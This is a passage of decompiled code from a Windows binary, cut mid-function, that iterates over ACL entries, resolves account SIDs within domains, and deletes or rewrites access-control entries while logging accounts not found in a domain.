																								_t1668 = 0x19;
																							}
																						}
																					}
																				}
																				_t1576 = _a36;
																				__eflags = _t1576 - 8;
																				if(_t1576 < 8) {
																					L243:
																					_a32 = 0;
																					_a16 = 0;
																					_t979 = _a8;
																					_a36 = 7;
																					__eflags = _t979;
																					if(_t979 != 0) {
																						E012D3434(_t979);
																						_t1704 = _t1704 + 4;
																						_a8 = 0;
																					}
																					_t1463 = _a12;
																					__eflags = _t1463;
																					if(_t1463 != 0) {
																						E012D3434(_t1463);
																					}
																					 *[fs:0x0] = _v24;
																					return _t1668;
																				} else {
																					_t1466 = _a16;
																					_t1577 = 2 + _t1576 * 2;
																					_t983 = _t1466;
																					__eflags = _t1577 - 0x1000;
																					if(_t1577 < 0x1000) {
																						L242:
																						_push(_t1577);
																						E012CAE27(_t1466);
																						_t1704 = _t1704 + 8;
																						goto L243;
																					} else {
																						_t1466 =  *(_t1466 - 4);
																						_t1577 = _t1577 + 0x23;
																						__eflags = _t983 - _t1466 + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							E012CF35F(_t1428, _t1466, _t1577, __eflags);
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							_push(_t1428);
																							_t1430 = _t1704;
																							_t1709 = (_t1704 - 0x00000008 & 0xfffffff8) + 4;
																							_push(_t1689);
																							_v465 =  *((intOrPtr*)(_t1430 + 4));
																							_t1692 = _t1709;
																							_push(0xffffffff);
																							_push(0x12ec4f3);
																							_push( *[fs:0x0]);
																							_push(_t1430);
																							_t1710 = _t1709 - 0x158;
																							_t989 =  *0x1309018; // 0xedd8d3b4
																							_t990 = _t989 ^ _t1692;
																							_v489 = _t990;
																							_push(_t1668);
																							_push(_t1643);
																							_push(_t990);
																							 *[fs:0x0] =  &_v481;
																							_t1670 = _t1466;
																							_v777 = _t1670;
																							_t992 =  *((intOrPtr*)(_t1430 + 8));
																							asm("xorps xmm0, xmm0");
																							_v801 = 0;
																							_v813 = 0;
																							asm("movq [ebp-0xf8], xmm0");
																							_v709 = 0;
																							_v797 = 0;
																							__eflags = _t992 - 1;
																							if(_t992 != 1) {
																								__eflags = _t992 - 2;
																								if(_t992 != 2) {
																									_t993 = 3;
																									goto L449;
																								} else {
																									_t1646 =  *(_t1670 + 8);
																									_v325 = 1;
																									goto L253;
																								}
																							} else {
																								_t1646 =  *(_t1670 + 4);
																								_v325 = 0;
																								L253:
																								_v336 = _t1646;
																								__eflags = _t1646;
																								if(_t1646 != 0) {
																									_t996 = GetAclInformation(_t1646,  &_v272, 0xc, 2);
																									__eflags = _t996;
																									if(_t996 != 0) {
																										_t997 = _v272;
																										_t1471 = 0;
																										_v348 = _t997;
																										_v364 = 0;
																										__eflags = _t997;
																										if(_t997 == 0) {
																											L447:
																											_t993 = _v368;
																											goto L449;
																										} else {
																											while(1) {
																												_t999 = GetAce(_t1646, _t1471,  &_v352);
																												__eflags = _t999;
																												if(_t999 == 0) {
																													goto L256;
																												}
																												_t1672 = 0;
																												_v324 = 0;
																												_v28 = 0;
																												_t1648 = _v352 + 8;
																												__eflags = _t1648;
																												if(_t1648 == 0) {
																													L443:
																													_t1649 = 0x1d;
																													goto L444;
																												} else {
																													_t1002 = IsValidSid(_t1648);
																													__eflags = _t1002;
																													if(_t1002 == 0) {
																														_t1672 = _v324;
																													} else {
																														_t1231 = _v324;
																														__eflags = _t1231;
																														if(_t1231 != 0) {
																															E012D3434(_t1231);
																															_t1710 = _t1710 + 4;
																															_v324 = 0;
																														}
																														_t1232 = IsValidSid(_t1648);
																														__eflags = _t1232;
																														if(_t1232 == 0) {
																															L268:
																															_t1672 = 0;
																															__eflags = 0;
																														} else {
																															_t1233 = GetLengthSid(_t1648);
																															_push(1);
																															_push(_t1233);
																															_v344 = _t1233;
																															_t1672 = E012D4006();
																															_t1710 = _t1710 + 8;
																															__eflags = _t1672;
																															if(_t1672 == 0) {
																																goto L268;
																															} else {
																																_t1235 = CopySid(_v344, _t1672, _t1648);
																																__eflags = _t1235;
																																if(_t1235 == 0) {
																																	E012D3434(_t1672);
																																	_t1710 = _t1710 + 4;
																																	goto L268;
																																}
																															}
																														}
																														_v324 = _t1672;
																													}
																													__eflags = _t1672;
																													if(_t1672 == 0) {
																														goto L443;
																													} else {
																														_t1003 = IsValidSid(_t1672);
																														__eflags = _t1003;
																														if(_t1003 == 0) {
																															_t1672 = _v324;
																															goto L443;
																														} else {
																															_t1004 = _v352;
																															__eflags =  *(_t1004 + 1) & 0x00000010;
																															if(( *(_t1004 + 1) & 0x00000010) == 0) {
																																_v76.Group = 0;
																																_v52 = 0;
																																_v48 = 7;
																																_v76.Group = 0;
																																_v92 = 0;
																																_v76.Revision = 0;
																																_v76.Owner = 7;
																																_v92 = 0;
																																_t1670 = _v332;
																																_v28 = 2;
																																_t512 =  *(_t1670 + 0x34) + 0x3c; // 0x3c
																																_t1010 = E012C9020( *(_t1670 + 0x34) + 0x1c,  &_v324,  &_v92,  &(_v76.Group),  &_v360, _t512);
																																_t1710 = _t1710 + 0x10;
																																_v368 = _t1010;
																																__eflags = _t1010;
																																if(_t1010 == 0) {
																																	_t1011 = _v360;
																																	__eflags = _t1011 - 6;
																																	if(_t1011 == 6) {
																																		L413:
																																		_v28 = 1;
																																		_t1579 = _v76.Owner;
																																		__eflags = _t1579 - 8;
																																		if(_t1579 < 8) {
																																			L417:
																																			_v28 = 0;
																																			_t1577 = _v48;
																																			__eflags = _t1577 - 8;
																																			if(_t1577 < 8) {
																																				L421:
																																				_v28 = 0xffffffff;
																																				_v76.Group = 0;
																																				_t1013 = _v324;
																																				_v52 = 0;
																																				_v48 = 7;
																																				__eflags = _t1013;
																																				if(_t1013 != 0) {
																																					E012D3434(_t1013);
																																					_t1710 = _t1710 + 4;
																																					_v324 = 0;
																																				}
																																				goto L277;
																																			} else {
																																				_t1475 = _v76.Group;
																																				_t1577 = 2 + _t1577 * 2;
																																				_t1015 = _t1475;
																																				__eflags = _t1577 - 0x1000;
																																				if(_t1577 < 0x1000) {
																																					L420:
																																					_push(_t1577);
																																					E012CAE27(_t1475);
																																					_t1710 = _t1710 + 8;
																																					goto L421;
																																				} else {
																																					_t1475 =  *(_t1475 - 4);
																																					_t1577 = _t1577 + 0x23;
																																					__eflags = _t1015 - _t1475 + 0xfffffffc - 0x1f;
																																					if(__eflags > 0) {
																																						goto L451;
																																					} else {
																																						goto L420;
																																					}
																																				}
																																			}
																																		} else {
																																			_t1483 = _v92;
																																			_t1584 = 2 + _t1579 * 2;
																																			_t1040 = _t1483;
																																			__eflags = _t1584 - 0x1000;
																																			if(_t1584 < 0x1000) {
																																				L416:
																																				_push(_t1584);
																																				E012CAE27(_t1483);
																																				_t1710 = _t1710 + 8;
																																				goto L417;
																																			} else {
																																				_t1475 =  *(_t1483 - 4);
																																				_t1577 = _t1584 + 0x23;
																																				__eflags = _t1040 - _t1475 + 0xfffffffc - 0x1f;
																																				if(__eflags > 0) {
																																					goto L451;
																																				} else {
																																					goto L416;
																																				}
																																			}
																																		}
																																	} else {
																																		__eflags = _t1011 - 7;
																																		if(_t1011 == 7) {
																																			goto L413;
																																		} else {
																																			__eflags = _t1011 - 8;
																																			if(_t1011 == 8) {
																																				goto L413;
																																			} else {
																																				__eflags = _v76.Revision;
																																				if(_v76.Revision == 0) {
																																					L403:
																																					_v28 = 1;
																																					_t1585 = _v76.Owner;
																																					__eflags = _t1585 - 8;
																																					if(_t1585 < 8) {
																																						L407:
																																						_v28 = 0;
																																						_t1577 = _v48;
																																						__eflags = _t1577 - 8;
																																						if(_t1577 < 8) {
																																							L411:
																																							_v28 = 0xffffffff;
																																							_v76.Group = 0;
																																							_t1045 = _v324;
																																							_v52 = 0;
																																							_v48 = 7;
																																							__eflags = _t1045;
																																							if(_t1045 != 0) {
																																								E012D3434(_t1045);
																																								_t1710 = _t1710 + 4;
																																								_v324 = 0;
																																							}
																																							goto L277;
																																						} else {
																																							_t1484 = _v76.Group;
																																							_t1577 = 2 + _t1577 * 2;
																																							_t1047 = _t1484;
																																							__eflags = _t1577 - 0x1000;
																																							if(_t1577 < 0x1000) {
																																								L410:
																																								_push(_t1577);
																																								E012CAE27(_t1484);
																																								_t1710 = _t1710 + 8;
																																								goto L411;
																																							} else {
																																								_t1475 =  *(_t1484 - 4);
																																								_t1577 = _t1577 + 0x23;
																																								__eflags = _t1047 - _t1475 + 0xfffffffc - 0x1f;
																																								if(__eflags > 0) {
																																									goto L451;
																																								} else {
																																									goto L410;
																																								}
																																							}
																																						}
																																					} else {
																																						_t1485 = _v92;
																																						_t1586 = 2 + _t1585 * 2;
																																						_t1051 = _t1485;
																																						__eflags = _t1586 - 0x1000;
																																						if(_t1586 < 0x1000) {
																																							L406:
																																							_push(_t1586);
																																							E012CAE27(_t1485);
																																							_t1710 = _t1710 + 8;
																																							goto L407;
																																						} else {
																																							_t1475 =  *(_t1485 - 4);
																																							_t1577 = _t1586 + 0x23;
																																							__eflags = _t1051 - _t1475 + 0xfffffffc - 0x1f;
																																							if(__eflags > 0) {
																																								goto L451;
																																							} else {
																																								goto L406;
																																							}
																																						}
																																					}
																																				} else {
																																					__eflags = _v52;
																																					if(_v52 == 0) {
																																						goto L403;
																																					} else {
																																						_t1670 =  *(_t1670 + 0x34);
																																						_t1648 = 0;
																																						_v344 = 0;
																																						_t1588 = 0x38e38e39 * ( *((intOrPtr*)(_t1670 + 0x14)) -  *((intOrPtr*)(_t1670 + 0x10))) >> 0x20 >> 4;
																																						__eflags = (_t1588 >> 0x1f) + _t1588;
																																						if((_t1588 >> 0x1f) + _t1588 == 0) {
																																							L394:
																																							_v28 = 1;
																																							_t1589 = _v76.Owner;
																																							__eflags = _t1589 - 8;
																																							if(_t1589 < 8) {
																																								L398:
																																								_v28 = 0;
																																								_t1577 = _v48;
																																								__eflags = _t1577 - 8;
																																								if(_t1577 < 8) {
																																									L402:
																																									_v52 = 0;
																																									_v48 = 7;
																																									_v76.Group = 0;
																																									goto L274;
																																								} else {
																																									_t1488 = _v76.Group;
																																									_t1577 = 2 + _t1577 * 2;
																																									_t1063 = _t1488;
																																									__eflags = _t1577 - 0x1000;
																																									if(_t1577 < 0x1000) {
																																										L401:
																																										_push(_t1577);
																																										E012CAE27(_t1488);
																																										_t1710 = _t1710 + 8;
																																										goto L402;
																																									} else {
																																										_t1475 =  *(_t1488 - 4);
																																										_t1577 = _t1577 + 0x23;
																																										__eflags = _t1063 - _t1475 + 0xfffffffc - 0x1f;
																																										if(__eflags > 0) {
																																											goto L451;
																																										} else {
																																											goto L401;
																																										}
																																									}
																																								}
																																							} else {
																																								_t1489 = _v92;
																																								_t1590 = 2 + _t1589 * 2;
																																								_t1067 = _t1489;
																																								__eflags = _t1590 - 0x1000;
																																								if(_t1590 < 0x1000) {
																																									L397:
																																									_push(_t1590);
																																									E012CAE27(_t1489);
																																									_t1710 = _t1710 + 8;
																																									goto L398;
																																								} else {
																																									_t1475 =  *(_t1489 - 4);
																																									_t1577 = _t1590 + 0x23;
																																									__eflags = _t1067 - _t1475 + 0xfffffffc - 0x1f;
																																									if(__eflags > 0) {
																																										goto L451;
																																									} else {
																																										goto L397;
																																									}
																																								}
																																							}
																																						} else {
																																							do {
																																								_t1679 =  *((intOrPtr*)(_t1670 + 0x10));
																																								_t1648 = _t1648 + _t1648 * 8 << 3;
																																								_v128 = 0x12ffe30;
																																								_t551 = _t1648 + 4; // 0x4
																																								E012983B0( &_v124, _t551 + _t1679);
																																								_v100 =  *((intOrPtr*)(_t1679 + _t1648 + 0x1c));
																																								_v96 =  *((intOrPtr*)(_t1679 + _t1648 + 0x20));
																																								_v28 = 3;
																																								_v188 = 0x12ffe30;
																																								_t1670 =  *( *(_v332 + 0x34) + 0x10);
																																								E012983B0( &_v184, _t1670 + 0x28 + _t1648);
																																								_v160 =  *(_t1670 + _t1648 + 0x40);
																																								_v156 =  *((intOrPtr*)(_t1670 + _t1648 + 0x44));
																																								__eflags = _v325;
																																								if(_v325 == 0) {
																																									__eflags = _v96 & 0x00000001;
																																									if(__eflags == 0) {
																																										goto L342;
																																									} else {
																																										goto L301;
																																									}
																																								} else {
																																									__eflags = _v96 & 0x00000002;
																																									if(__eflags != 0) {
																																										L301:
																																										_push(1);
																																										_v28 = 5;
																																										_t1670 = E012C9DCB(_t1430, _t1648, _t1670, __eflags);
																																										_v376 = _t1670;
																																										_v28 = 6;
																																										_push( &_v380);
																																										_t1577 =  &_v124;
																																										_t1099 = E012A3780( &(_v76.Group),  &_v124);
																																										_t1710 = _t1710 + 8;
																																										_v326 = _t1099;
																																										_v28 = 4;
																																										__eflags = _t1670;
																																										if(_t1670 != 0) {
																																											_t1621 =  *_t1670;
																																											_t1577 =  *(_t1621 + 8);
																																											_t1218 =  *( *(_t1621 + 8))();
																																											__eflags = _t1218;
																																											if(_t1218 != 0) {
																																												_t1577 =  *( *_t1218);
																																												 *( *( *_t1218))(1);
																																											}
																																											_t1099 = _v326;
																																										}
																																										__eflags = _t1099;
																																										if(_t1099 == 0) {
																																											goto L342;
																																										} else {
																																											_t1670 = 0;
																																											__eflags = _v100 & 0x00000200;
																																											if((_v100 & 0x00000200) != 0) {
																																												_t1101 = DeleteAce(_v336, _v344);
																																												__eflags = _t1101;
																																												if(_t1101 == 0) {
																																													_t1102 = GetLastError();
																																													_t1649 = 0x1e;
																																													 *(_v332 + 0x10) = _t1102;
																																													goto L425;
																																												} else {
																																													_t780 =  &_v348;
																																													 *_t780 = _v348 - 1;
																																													__eflags =  *_t780;
																																													goto L385;
																																												}
																																											} else {
																																												_t1475 = _v168;
																																												__eflags = _t1475;
																																												if(_t1475 == 0) {
																																													_t1649 = 3;
																																													goto L425;
																																												} else {
																																													__eflags = 0x7ffffffe - _t1475 - 1;
																																													if(__eflags < 0) {
																																														L450:
																																														E012A1D70(_t1475);
																																														goto L451;
																																													} else {
																																														__eflags = _v164 - 8;
																																														_t1134 =  >=  ? _v184 :  &_v184;
																																														E01299780( &_v212, _v360, _t1475,  >=  ? _v184 :  &_v184, _t1475, "\\", 1);
																																														_v28 = 7;
																																														__eflags = _v76.Owner - 8;
																																														_push(_v76.Revision);
																																														_t1137 =  >=  ? _v92 :  &_v92;
																																														_t1138 = E01299A40( &_v212, _t1735,  >=  ? _v92 :  &_v92);
																																														_v152 = 0;
																																														_v136 = 0;
																																														_t1648 = _v356 | 3;
																																														_v132 = 0;
																																														asm("movups xmm0, [eax]");
																																														_v356 = _t1648;
																																														asm("movups [ebp-0x80], xmm0");
																																														asm("movq xmm0, [eax+0x10]");
																																														asm("movq [ebp-0x70], xmm0");
																																														 *((intOrPtr*)(_t1138 + 0x10)) = 0;
																																														 *(_t1138 + 0x14) = 7;
																																														 *_t1138 = 0;
																																														_v28 = 9;
																																														_t1577 = _v192;
																																														__eflags = _t1577 - 8;
																																														if(_t1577 < 8) {
																																															L313:
																																															_v340 = 0;
																																															_v28 = 0xa;
																																															_t1140 = E012C7950( &_v340, _t1577,  &_v152, 0);
																																															__eflags = _t1140;
																																															if(_t1140 == 0) {
																																																_t1141 = _v100;
																																																__eflags = _t1141 & 0x00000100;
																																																if((_t1141 & 0x00000100) == 0) {
																																																	__eflags = _t1141 & 0x00000400;
																																																	if((_t1141 & 0x00000400) == 0) {
																																																		_t1648 = _v332;
																																																		goto L365;
																																																	} else {
																																																		E012C7820(_t1710,  &_v340);
																																																		_t1648 = _v332;
																																																		_t1670 = E012C2F70(_t1648, _t1577, _v336, _v344,  &_v340);
																																																		__eflags = _t1670;
																																																		if(_t1670 == 0) {
																																																			goto L354;
																																																		} else {
																																																			_v348 = _v348 + 1;
																																																			goto L365;
																																																		}
																																																	}
																																																} else {
																																																	E012C7820(_t1710,  &_v340);
																																																	_t1648 = _v332;
																																																	_t1670 = E012C3120(_t1648, _t1577, _v336, _v344,  &_v340);
																																																	__eflags = _t1670;
																																																	if(_t1670 != 0) {
																																																		L365:
																																																		_t1142 = _v340;
																																																		__eflags = _t1142;
																																																		if(_t1142 != 0) {
																																																			E012D3434(_t1142);
																																																			_t1710 = _t1710 + 4;
																																																		}
																																																		_v28 = 4;
																																																		_t1605 = _v132;
																																																		__eflags = _t1605 - 8;
																																																		if(_t1605 < 8) {
																																																			L371:
																																																			_v136 = 0;
																																																			_v132 = 7;
																																																			_v152 = 0;
																																																			__eflags = _t1670;
																																																			if(_t1670 != 0) {
																																																				_t1144 =  *((intOrPtr*)(_t1430 + 8));
																																																				__eflags = _t1144 - 1;
																																																				if(_t1144 != 1) {
																																																					__eflags = _t1144 - 2;
																																																					if(_t1144 == 2) {
																																																						_t1145 =  *(_t1648 + 8);
																																																						__eflags = _t1145;
																																																						if(_t1145 != 0) {
																																																							__eflags =  *((char*)(_t1648 + 0x3a));
																																																							if( *((char*)(_t1648 + 0x3a)) != 0) {
																																																								E012D3434(_t1145);
																																																								_t1710 = _t1710 + 4;
																																																								 *(_t1648 + 8) = 0;
																																																								 *((char*)(_t1648 + 0x3a)) = 0;
																																																							}
																																																						}
																																																					}
																																																					__eflags =  *((intOrPtr*)(_t1430 + 8)) - 2;
																																																					_v336 = _t1670;
																																																					if( *((intOrPtr*)(_t1430 + 8)) == 2) {
																																																						 *(_t1648 + 8) = _t1670;
																																																						 *((char*)(_t1648 + 0x3a)) = 1;
																																																					}
																																																				} else {
																																																					_t1147 =  *(_t1648 + 4);
																																																					__eflags = _t1147;
																																																					if(_t1147 != 0) {
																																																						__eflags =  *((char*)(_t1648 + 0x39));
																																																						if( *((char*)(_t1648 + 0x39)) != 0) {
																																																							E012D3434(_t1147);
																																																							_t1710 = _t1710 + 4;
																																																						}
																																																					}
																																																					_v336 = _t1670;
																																																					 *(_t1648 + 4) = _t1670;
																																																					 *((char*)(_t1648 + 0x39)) = 1;
																																																				}
																																																			}
																																																			L385:
																																																			_v28 = 3;
																																																			_t1601 = _v164;
																																																			__eflags = _t1601 - 8;
																																																			if(_t1601 < 8) {
																																																				L389:
																																																				_v28 = 2;
																																																				_t1602 = _v104;
																																																				_v128 = 0x12ffe30;
																																																				__eflags = _t1602 - 8;
																																																				if(_t1602 < 8) {
																																																					L393:
																																																					__eflags = 0;
																																																					_v108 = 0;
																																																					_v104 = 7;
																																																					_v124 = 0;
																																																					goto L394;
																																																				} else {
																																																					_t1502 = _v124;
																																																					_t1603 = 2 + _t1602 * 2;
																																																					_t1122 = _t1502;
																																																					__eflags = _t1603 - 0x1000;
																																																					if(_t1603 < 0x1000) {
																																																						L392:
																																																						_push(_t1603);
																																																						E012CAE27(_t1502);
																																																						_t1710 = _t1710 + 8;
																																																						goto L393;
																																																					} else {
																																																						_t1475 =  *(_t1502 - 4);
																																																						_t1577 = _t1603 + 0x23;
																																																						__eflags = _t1122 - _t1475 + 0xfffffffc - 0x1f;
																																																						if(__eflags > 0) {
																																																							goto L451;
																																																						} else {
																																																							goto L392;
																																																						}
																																																					}
																																																				}
																																																			} else {
																																																				_t1503 = _v184;
																																																				_t1604 = 2 + _t1601 * 2;
																																																				_t1126 = _t1503;
																																																				__eflags = _t1604 - 0x1000;
																																																				if(_t1604 < 0x1000) {
																																																					L388:
																																																					_push(_t1604);
																																																					E012CAE27(_t1503);
																																																					_t1710 = _t1710 + 8;
																																																					goto L389;
																																																				} else {
																																																					_t1475 =  *(_t1503 - 4);
																																																					_t1577 = _t1604 + 0x23;
																																																					__eflags = _t1126 - _t1475 + 0xfffffffc - 0x1f;
																																																					if(__eflags > 0) {
																																																						goto L451;
																																																					} else {
																																																						goto L388;
																																																					}
																																																				}
																																																			}
																																																		} else {
																																																			_t1508 = _v152;
																																																			_t1606 = 2 + _t1605 * 2;
																																																			_t1149 = _t1508;
																																																			__eflags = _t1606 - 0x1000;
																																																			if(_t1606 < 0x1000) {
																																																				L370:
																																																				_push(_t1606);
																																																				E012CAE27(_t1508);
																																																				_t1710 = _t1710 + 8;
																																																				goto L371;
																																																			} else {
																																																				_t1475 =  *(_t1508 - 4);
																																																				_t1577 = _t1606 + 0x23;
																																																				__eflags = _t1149 - _t1475 + 0xfffffffc - 0x1f;
																																																				if(__eflags > 0) {
																																																					goto L451;
																																																				} else {
																																																					goto L370;
																																																				}
																																																			}
																																																		}
																																																	} else {
																																																		L354:
																																																		 *((intOrPtr*)(_t1648 + 0x10)) = GetLastError();
																																																		_t1159 = _v340;
																																																		__eflags = _t1159;
																																																		if(_t1159 != 0) {
																																																			E012D3434(_t1159);
																																																			_t1710 = _t1710 + 4;
																																																		}
																																																		_t1607 = _v132;
																																																		__eflags = _t1607 - 8;
																																																		if(_t1607 < 8) {
																																																			L360:
																																																			_v136 = 0;
																																																			_v132 = 7;
																																																			_v152 = 0;
																																																			_t1649 = 0x1f;
																																																			L425:
																																																			_t1595 = _v164;
																																																			__eflags = _t1595 - 8;
																																																			if(_t1595 < 8) {
																																																				L429:
																																																				_t1596 = _v104;
																																																				_v128 = 0x12ffe30;
																																																				__eflags = _t1596 - 8;
																																																				if(_t1596 < 8) {
																																																					L433:
																																																					_t1597 = _v76.Owner;
																																																					_v108 = 0;
																																																					_v104 = 7;
																																																					_v124 = 0;
																																																					__eflags = _t1597 - 8;
																																																					if(_t1597 < 8) {
																																																						L437:
																																																						_t1577 = _v48;
																																																						__eflags = _t1577 - 8;
																																																						if(_t1577 < 8) {
																																																							L441:
																																																							_t1672 = _v324;
																																																							_v52 = 0;
																																																							_v48 = 7;
																																																							_v76.Group = 0;
																																																							L444:
																																																							__eflags = _t1672;
																																																							if(_t1672 != 0) {
																																																								E012D3434(_t1672);
																																																							}
																																																							_t993 = _t1649;
																																																							goto L449;
																																																						} else {
																																																							_t1498 = _v76.Group;
																																																							_t1577 = 2 + _t1577 * 2;
																																																							_t1105 = _t1498;
																																																							__eflags = _t1577 - 0x1000;
																																																							if(_t1577 < 0x1000) {
																																																								L440:
																																																								_push(_t1577);
																																																								E012CAE27(_t1498);
																																																								_t1710 = _t1710 + 8;
																																																								goto L441;
																																																							} else {
																																																								_t1475 =  *(_t1498 - 4);
																																																								_t1577 = _t1577 + 0x23;
																																																								__eflags = _t1105 - _t1475 + 0xfffffffc - 0x1f;
																																																								if(__eflags > 0) {
																																																									goto L451;
																																																								} else {
																																																									goto L440;
																																																								}
																																																							}
																																																						}
																																																					} else {
																																																						_t1499 = _v92;
																																																						_t1598 = 2 + _t1597 * 2;
																																																						_t1109 = _t1499;
																																																						__eflags = _t1598 - 0x1000;
																																																						if(_t1598 < 0x1000) {
																																																							L436:
																																																							_push(_t1598);
																																																							E012CAE27(_t1499);
																																																							_t1710 = _t1710 + 8;
																																																							goto L437;
																																																						} else {
																																																							_t1475 =  *(_t1499 - 4);
																																																							_t1577 = _t1598 + 0x23;
																																																							__eflags = _t1109 - _t1475 + 0xfffffffc - 0x1f;
																																																							if(__eflags > 0) {
																																																								goto L451;
																																																							} else {
																																																								goto L436;
																																																							}
																																																						}
																																																					}
																																																				} else {
																																																					_t1500 = _v124;
																																																					_t1599 = 2 + _t1596 * 2;
																																																					_t1113 = _t1500;
																																																					__eflags = _t1599 - 0x1000;
																																																					if(_t1599 < 0x1000) {
																																																						L432:
																																																						_push(_t1599);
																																																						E012CAE27(_t1500);
																																																						_t1710 = _t1710 + 8;
																																																						goto L433;
																																																					} else {
																																																						_t1475 =  *(_t1500 - 4);
																																																						_t1577 = _t1599 + 0x23;
																																																						__eflags = _t1113 - _t1475 + 0xfffffffc - 0x1f;
																																																						if(__eflags > 0) {
																																																							goto L451;
																																																						} else {
																																																							goto L432;
																																																						}
																																																					}
																																																				}
																																																			} else {
																																																				_t1501 = _v184;
																																																				_t1600 = 2 + _t1595 * 2;
																																																				_t1117 = _t1501;
																																																				__eflags = _t1600 - 0x1000;
																																																				if(_t1600 < 0x1000) {
																																																					L428:
																																																					_push(_t1600);
																																																					E012CAE27(_t1501);
																																																					_t1710 = _t1710 + 8;
																																																					goto L429;
																																																				} else {
																																																					_t1475 =  *(_t1501 - 4);
																																																					_t1577 = _t1600 + 0x23;
																																																					__eflags = _t1117 - _t1475 + 0xfffffffc - 0x1f;
																																																					if(__eflags > 0) {
																																																						goto L451;
																																																					} else {
																																																						goto L428;
																																																					}
																																																				}
																																																			}
																																																		} else {
																																																			_t1511 = _v152;
																																																			_t1608 = 2 + _t1607 * 2;
																																																			_t1161 = _t1511;
																																																			__eflags = _t1608 - 0x1000;
																																																			if(_t1608 < 0x1000) {
																																																				L359:
																																																				_push(_t1608);
																																																				E012CAE27(_t1511);
																																																				_t1710 = _t1710 + 8;
																																																				goto L360;
																																																			} else {
																																																				_t1475 =  *(_t1511 - 4);
																																																				_t1577 = _t1608 + 0x23;
																																																				__eflags = _t1161 - _t1475 + 0xfffffffc - 0x1f;
																																																				if(__eflags > 0) {
																																																					goto L451;
																																																				} else {
																																																					goto L359;
																																																				}
																																																			}
																																																		}
																																																	}
																																																}
																																															} else {
																																																_t1475 = _v76;
																																																__eflags = 0x7ffffffe - _t1475 - 9;
																																																if(__eflags < 0) {
																																																	goto L450;
																																																} else {
																																																	__eflags = _v76.Owner - 8;
																																																	_t1173 =  >=  ? _v92 :  &_v92;
																																																	E01299780( &_v320, _v360, _t1475, L"Account <", 9,  >=  ? _v92 :  &_v92, _t1475);
																																																	_push(0x1b);
																																																	_v28 = 0xb;
																																																	_t1175 = E01299A40( &_v320, _t1735, L"> was not found in domain <");
																																																	_v260 = 0;
																																																	_v244 = 0;
																																																	_v240 = 0;
																																																	asm("movups xmm0, [eax]");
																																																	asm("movups [ebp-0xec], xmm0");
																																																	asm("movq xmm0, [eax+0x10]");
																																																	asm("movq [ebp-0xdc], xmm0");
																																																	 *(_t1175 + 0x10) = 0;
																																																	 *(_t1175 + 0x14) = 7;
																																																	 *_t1175 = 0;
																																																	_v28 = 0xc;
																																																	__eflags = _v164 - 8;
																																																	_push(_v168);
																																																	_t1177 =  >=  ? _v184 :  &_v184;
																																																	_t1178 = E01299A40( &_v260, _t1735,  >=  ? _v184 :  &_v184);
																																																	_v236 = 0;
																																																	_v220 = 0;
																																																	_v216 = 0;
																																																	asm("movups xmm0, [eax]");
																																																	asm("movups [ebp-0xd4], xmm0");
																																																	asm("movq xmm0, [eax+0x10]");
																																																	asm("movq [ebp-0xc4], xmm0");
																																																	 *(_t1178 + 0x10) = 0;
																																																	 *(_t1178 + 0x14) = 7;
																																																	 *_t1178 = 0;
																																																	_push(2);
																																																	_v28 = 0xd;
																																																	_t1179 = E01299A40( &_v236, _t1735, L">.");
																																																	_t1648 = _t1648 | 0x0000003c;
																																																	_v356 = _t1648;
																																																	asm("movups xmm0, [eax]");
																																																	asm("movups [ebp-0x110], xmm0");
																																																	asm("movq xmm0, [eax+0x10]");
																																																	asm("movq [ebp-0x100], xmm0");
																																																	 *(_t1179 + 0x10) = 0;
																																																	 *(_t1179 + 0x14) = 7;
																																																	 *_t1179 = 0;
																																																	_v28 = 0xe;
																																																	_v212 = 0;
																																																	_v196 = 0;
																																																	_v192 = 7;
																																																	_v212 = 0;
																																																	E012A1EE0(_t1430,  &_v212, _t1577, _t1648, _t1670, L"ProcessACEsOfGivenDomains", 0x19);
																																																	_v28 = 0xf;
																																																	E012A98F0(_t1430, _t1648, _t1735, 1,  &_v212,  &_v296, 0x80000000);
																																																	_v28 = 0xe;
																																																	_t1609 = _v192;
																																																	__eflags = _t1609 - 8;
																																																	if(_t1609 < 8) {
																																																		L319:
																																																		_v28 = 0xd;
																																																		_t1610 = _v276;
																																																		__eflags = _t1610 - 8;
																																																		if(_t1610 < 8) {
																																																			L323:
																																																			_v28 = 0xc;
																																																			_t1611 = _v216;
																																																			__eflags = _t1611 - 8;
																																																			if(_t1611 < 8) {
																																																				L327:
																																																				_v28 = 0xb;
																																																				_t1612 = _v240;
																																																				_v220 = 0;
																																																				_v216 = 7;
																																																				_v236 = 0;
																																																				__eflags = _t1612 - 8;
																																																				if(_t1612 < 8) {
																																																					L331:
																																																					_v28 = 0xa;
																																																					_t1613 = _v300;
																																																					_v244 = 0;
																																																					_v240 = 7;
																																																					_v260 = 0;
																																																					__eflags = _t1613 - 8;
																																																					if(_t1613 < 8) {
																																																						L335:
																																																						_t1187 = _v340;
																																																						__eflags = _t1187;
																																																						if(_t1187 != 0) {
																																																							E012D3434(_t1187);
																																																							_t1710 = _t1710 + 4;
																																																						}
																																																						_v28 = 4;
																																																						_t1614 = _v132;
																																																						__eflags = _t1614 - 8;
																																																						if(_t1614 < 8) {
																																																							L341:
																																																							__eflags = 0;
																																																							_v136 = 0;
																																																							_v132 = 7;
																																																							_v152 = 0;
																																																							goto L342;
																																																						} else {
																																																							_t1522 = _v152;
																																																							_t1615 = 2 + _t1614 * 2;
																																																							_t1189 = _t1522;
																																																							__eflags = _t1615 - 0x1000;
																																																							if(_t1615 < 0x1000) {
																																																								L340:
																																																								_push(_t1615);
																																																								E012CAE27(_t1522);
																																																								_t1710 = _t1710 + 8;
																																																								goto L341;
																																																							} else {
																																																								_t1475 =  *(_t1522 - 4);
																																																								_t1577 = _t1615 + 0x23;
																																																								__eflags = _t1189 - _t1475 + 0xfffffffc - 0x1f;
																																																								if(__eflags > 0) {
																																																									goto L451;
																																																								} else {
																																																									goto L340;
																																																								}
																																																							}
																																																						}
																																																					} else {
																																																						_t1523 = _v320;
																																																						_t1616 = 2 + _t1613 * 2;
																																																						_t1194 = _t1523;
																																																						__eflags = _t1616 - 0x1000;
																																																						if(_t1616 < 0x1000) {
																																																							L334:
																																																							_push(_t1616);
																																																							E012CAE27(_t1523);
																																																							_t1710 = _t1710 + 8;
																																																							goto L335;
																																																						} else {
																																																							_t1475 =  *(_t1523 - 4);
																																																							_t1577 = _t1616 + 0x23;
